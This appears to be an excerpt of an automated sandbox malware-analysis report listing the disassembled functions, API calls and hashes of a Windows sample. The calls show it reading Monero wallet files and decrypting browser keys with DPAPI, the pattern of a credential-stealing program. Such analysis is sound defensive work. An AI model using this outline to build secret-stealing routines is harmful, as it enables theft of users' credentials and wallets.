                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: fb405a01e81ba53251b016149c2ea164eefcc8dc180a6cd4bec05d195abc9d4f
                                • Instruction ID: 1bc8b290c38fbf7a5a19a108cc2073ce6f91e19f8795707a4caa0bb6cfa5f96a
                                • Opcode Fuzzy Hash: fb405a01e81ba53251b016149c2ea164eefcc8dc180a6cd4bec05d195abc9d4f
                                • Instruction Fuzzy Hash: AA910F728501089BEB14FBA0DC92FEE7339EF94304F514568F507A61A2EF346A49CB66
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,015BA2A0,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093D801
                                • lstrlen.KERNEL32(00000000), ref: 0093D99F
                                • lstrlen.KERNEL32(00000000), ref: 0093D9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 0093DA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 1b7dd4a382ef6cfae66dddd7f90f34e29a31e255d67c86d084ce9504b3b6341a
                                • Instruction ID: fbdb468f545a2bdcb400c4a9bbb7eecfb2339c081e41fa46790f462b5c6731ad
                                • Opcode Fuzzy Hash: 1b7dd4a382ef6cfae66dddd7f90f34e29a31e255d67c86d084ce9504b3b6341a
                                • Instruction Fuzzy Hash: 698111729501089BEB04FBA0DC96FEE7339EF94304F514518F407A71A2EF346A49CB66
                                APIs
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                  • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                  • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                  • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                  • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                  • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                  • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00951580,00950D92), ref: 0093F54C
                                • lstrlen.KERNEL32(00000000), ref: 0093F56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: 7dd785b46128c6de36c2c0ab3e73ae1e55b4f87eb7bc16ea6f7caf2c6ca268cf
                                • Instruction ID: caca134edc7e5f560d7b02e00087243e31cb196ba29f0cab70efb02e85cb409b
                                • Opcode Fuzzy Hash: 7dd785b46128c6de36c2c0ab3e73ae1e55b4f87eb7bc16ea6f7caf2c6ca268cf
                                • Instruction Fuzzy Hash: 12512371D50108AAEB14FBB0DC96FED7339EFD4304F408528F81667191EE346A09CBA6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 6b18fb3478530a34470c91320b1a7a4eea6c49155623a72a0c79fe095956f1c9
                                • Instruction ID: 926946bbdb3fa23340611b310f9a5d6b9aa64aa40cb93be52ad780a7dc05cadb
                                • Opcode Fuzzy Hash: 6b18fb3478530a34470c91320b1a7a4eea6c49155623a72a0c79fe095956f1c9
                                • Instruction Fuzzy Hash: 18413071D10109ABDB14EFB5D896FEEB778EF94308F008418E41677291DB75AA09CFA2
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                  • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                  • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                  • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                  • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                  • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                  • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00939D39
                                  • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939AEF
                                  • Part of subcall function 00939AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00934EEE,00000000,?), ref: 00939B01
                                  • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939B2A
                                  • Part of subcall function 00939AC0: LocalFree.KERNEL32(?,?,?,?,00934EEE,00000000,?), ref: 00939B3F
                                  • Part of subcall function 00939B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00939B84
                                  • Part of subcall function 00939B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00939BA3
                                  • Part of subcall function 00939B60: LocalFree.KERNEL32(?), ref: 00939BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 8a06a7bd27b77b96332a675bda8469f1bda4eee5c5af9d852245a0d2d2eba2c9
                                • Instruction ID: 20760747af92cf5115068bb94cd9aa84a0e2f99232606e3f7b57b2f811116d8c
                                • Opcode Fuzzy Hash: 8a06a7bd27b77b96332a675bda8469f1bda4eee5c5af9d852245a0d2d2eba2c9
                                • Instruction Fuzzy Hash: AF3100B6D10109ABDB14DFE4DC86FEFB7B8AB88304F144519F915A7281EB749A04CFA1
                                APIs
                                • CreateFileA.KERNEL32(00943AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00943AEE,?), ref: 009492FC
                                • GetFileSizeEx.KERNEL32(000000FF,00943AEE), ref: 00949319
                                • CloseHandle.KERNEL32(000000FF), ref: 00949327
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID:
                                • API String ID: 1378416451-0
                                • Opcode ID: ef42410a7879e723c8f79b48d3151d7b1230e55b37d4124f9445c0fd5232a3ad
                                • Instruction ID: d2d04edd7850801fd55890d072ec87c89f1bd51c93827dd2ec9e282dfeea4a8f
                                • Opcode Fuzzy Hash: ef42410a7879e723c8f79b48d3151d7b1230e55b37d4124f9445c0fd5232a3ad
                                • Instruction Fuzzy Hash: 2DF04935E44208BBDF24DFB0DC59F9E77B9AB88721F10C654BA55A72C0DA74AB418B40
                                APIs
                                • __getptd.LIBCMT ref: 0094C74E
                                  • Part of subcall function 0094BF9F: __amsg_exit.LIBCMT ref: 0094BFAF
                                • __getptd.LIBCMT ref: 0094C765
                                • __amsg_exit.LIBCMT ref: 0094C773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0094C797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 80401290d4cc76de7a9f88ceee617eec47897d6f070137cc60a8d4c92559f34c
                                • Instruction ID: 97f6e0c038feaa8d3a2f1dc1cf9558e3241c10059a3c46d65a2f39de8c19853f
                                • Opcode Fuzzy Hash: 80401290d4cc76de7a9f88ceee617eec47897d6f070137cc60a8d4c92559f34c
                                • Instruction Fuzzy Hash: 08F0E9729467009FD760BBB85807F5D33E06F80721F204289F408B71D3DF6499419F56
                                APIs
                                  • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00944F7A
                                • lstrcat.KERNEL32(?,00951070), ref: 00944F97
                                • lstrcat.KERNEL32(?,015B91C8), ref: 00944FAB
                                • lstrcat.KERNEL32(?,00951074), ref: 00944FBD
                                  • Part of subcall function 00944910: wsprintfA.USER32 ref: 0094492C
                                  • Part of subcall function 00944910: FindFirstFileA.KERNEL32(?,?), ref: 00944943
                                  • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FDC), ref: 00944971
                                  • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FE0), ref: 00944987
                                  • Part of subcall function 00944910: FindNextFileA.KERNEL32(000000FF,?), ref: 00944B7D
                                  • Part of subcall function 00944910: FindClose.KERNEL32(000000FF), ref: 00944B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: 99af37382bc856fed5ff505e336e5e22b0d15b767e91d8794ee8a65bea79cf54
                                • Instruction ID: 6897405cb2b751e8a4ac20f59f37660cd5fcfee5163cfc1a7de3ce104b277973
                                • Opcode Fuzzy Hash: 99af37382bc856fed5ff505e336e5e22b0d15b767e91d8794ee8a65bea79cf54
                                • Instruction Fuzzy Hash: 4B21987690020867C794FBB0DC46FEE333DABD4701F004554B65D93191EE74AAC88B93